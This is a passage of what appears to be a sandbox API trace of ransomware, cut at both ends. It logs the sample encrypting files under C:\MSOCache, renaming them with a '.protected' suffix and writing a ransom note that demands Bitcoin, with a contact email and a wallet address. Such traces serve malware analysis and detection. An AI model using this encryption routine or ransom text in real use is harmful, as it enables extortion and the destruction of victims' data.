CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, 
pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.077] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.077] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0058.077] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0058.077] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0058.077] StrStrW (lpFirst="Setup.xml", lpSrch=".rar") returned 0x0 [0058.077] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0058.077] StrStrW (lpFirst="Setup.xml", lpSrch=".zip") returned 0x0 [0058.077] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x7c4, lpOverlapped=0x0) returned 1 [0058.088] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff83c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.088] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x7c4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x7c4, lpOverlapped=0x0) returned 1 [0058.088] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.088] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: 
lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0058.088] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0058.088] CloseHandle (hObject=0xb4) returned 1 [0058.088] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.protected") returned 86 [0058.088] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.protected")) returned 1 [0058.089] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0058.089] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0058.089] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt") returned 84 [0058.089] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0058.090] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0058.090] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0058.090] lstrlenA (lpString="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") returned 684 [0058.090] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0058.090] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0058.090] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0058.090] CloseHandle (hObject=0xa4) returned 1 [0058.091] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0058.091] lstrcmpiW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0058.091] lstrcmpiW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="Program Files") returned -1 [0058.091] lstrcmpiW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="Program Files (x86)") returned -1 [0058.091] lstrcmpiW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0058.091] lstrcmpiW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0058.091] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C") returned 66 [0058.091] lstrcmpW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0058.091] lstrcmpW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0058.091] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*") returned 68 [0058.091] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x447cc0 [0058.097] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0058.097] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0058.097] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0058.097] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0058.097] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0058.097] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\.") returned 68 [0058.097] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.097] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0058.097] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0058.097] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.097] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.097] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\." 
(normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.097] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.098] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0058.098] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0058.098] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0058.098] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0058.098] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0058.098] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\..") returned 69 [0058.098] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0058.098] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.098] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0058.098] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0058.098] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.098] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.098] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\.." 
(normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.098] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.098] lstrcmpiW (lpString1="ProjectMUI.msi", lpString2="Windows") returned -1 [0058.098] lstrcmpiW (lpString1="ProjectMUI.msi", lpString2="Program Files") returned 1 [0058.098] lstrcmpiW (lpString1="ProjectMUI.msi", lpString2="Program Files (x86)") returned 1 [0058.098] lstrcmpiW (lpString1="ProjectMUI.msi", lpString2="$Recycle.bin") returned 1 [0058.098] lstrcmpiW (lpString1="ProjectMUI.msi", lpString2="System Volume Information") returned -1 [0058.098] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 81 [0058.098] StrStrIW (lpFirst="ProjectMUI.msi", lpSrch=".protected") returned 0x0 [0058.098] lstrcmpW (lpString1="ProjectMUI.msi", lpString2="RESTORE_FILES.txt") returned -1 [0058.098] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.098] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.098] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.488] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 81 [0058.488] StrStrW 
(lpFirst="ProjectMUI.msi", lpSrch=".txt") returned 0x0 [0058.488] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 81 [0058.488] StrStrW (lpFirst="ProjectMUI.msi", lpSrch=".rar") returned 0x0 [0058.488] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 81 [0058.488] StrStrW (lpFirst="ProjectMUI.msi", lpSrch=".zip") returned 0x0 [0058.488] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.490] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.490] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.490] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.490] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0058.491] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0058.491] CloseHandle (hObject=0xb4) returned 1 [0058.492] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.protected") returned 91 [0058.492] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi.protected")) returned 1 [0058.492] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.492] lstrcmpiW (lpString1="ProjectMUI.xml", lpString2="Windows") returned -1 [0058.492] lstrcmpiW (lpString1="ProjectMUI.xml", lpString2="Program Files") returned 1 [0058.492] lstrcmpiW (lpString1="ProjectMUI.xml", lpString2="Program Files (x86)") returned 1 [0058.492] lstrcmpiW (lpString1="ProjectMUI.xml", lpString2="$Recycle.bin") returned 1 [0058.492] lstrcmpiW (lpString1="ProjectMUI.xml", lpString2="System Volume Information") returned -1 [0058.492] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 81 [0058.493] StrStrIW (lpFirst="ProjectMUI.xml", lpSrch=".protected") returned 0x0 [0058.493] lstrcmpW (lpString1="ProjectMUI.xml", lpString2="RESTORE_FILES.txt") returned -1 [0058.493] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.493] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.493] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.493] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 81 [0058.493] StrStrW (lpFirst="ProjectMUI.xml", lpSrch=".txt") returned 0x0 [0058.493] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 81 [0058.493] StrStrW (lpFirst="ProjectMUI.xml", lpSrch=".rar") returned 0x0 [0058.493] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 81 [0058.493] StrStrW (lpFirst="ProjectMUI.xml", lpSrch=".zip") returned 0x0 [0058.494] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x5ac, lpOverlapped=0x0) returned 1 [0058.498] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffa54, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.499] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x5ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x5ac, lpOverlapped=0x0) returned 1 [0058.499] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.499] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0058.499] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0058.499] CloseHandle (hObject=0xb4) returned 
1 [0058.499] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.protected") returned 91 [0058.499] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.protected")) returned 1 [0058.500] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.500] lstrcmpiW (lpString1="ProjLR.cab", lpString2="Windows") returned -1 [0058.500] lstrcmpiW (lpString1="ProjLR.cab", lpString2="Program Files") returned 1 [0058.500] lstrcmpiW (lpString1="ProjLR.cab", lpString2="Program Files (x86)") returned 1 [0058.500] lstrcmpiW (lpString1="ProjLR.cab", lpString2="$Recycle.bin") returned 1 [0058.500] lstrcmpiW (lpString1="ProjLR.cab", lpString2="System Volume Information") returned -1 [0058.500] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 77 [0058.500] StrStrIW (lpFirst="ProjLR.cab", lpSrch=".protected") returned 0x0 [0058.500] lstrcmpW (lpString1="ProjLR.cab", lpString2="RESTORE_FILES.txt") returned -1 [0058.500] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.500] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.501] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All 
Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.504] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 77 [0058.504] StrStrW (lpFirst="ProjLR.cab", lpSrch=".txt") returned 0x0 [0058.504] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 77 [0058.504] StrStrW (lpFirst="ProjLR.cab", lpSrch=".rar") returned 0x0 [0058.504] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 77 [0058.504] StrStrW (lpFirst="ProjLR.cab", lpSrch=".zip") returned 0x0 [0058.505] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.520] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.520] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.520] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.520] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0058.543] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, 
nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0058.543] CloseHandle (hObject=0xb4) returned 1 [0058.543] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.protected") returned 87 [0058.543] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.protected" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab.protected")) returned 1 [0058.544] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.544] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0058.544] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files") returned 1 [0058.544] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files (x86)") returned 1 [0058.544] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0058.544] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0058.544] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0058.544] StrStrIW (lpFirst="Setup.xml", lpSrch=".protected") returned 0x0 [0058.544] lstrcmpW (lpString1="Setup.xml", lpString2="RESTORE_FILES.txt") returned 1 [0058.544] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.544] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, 
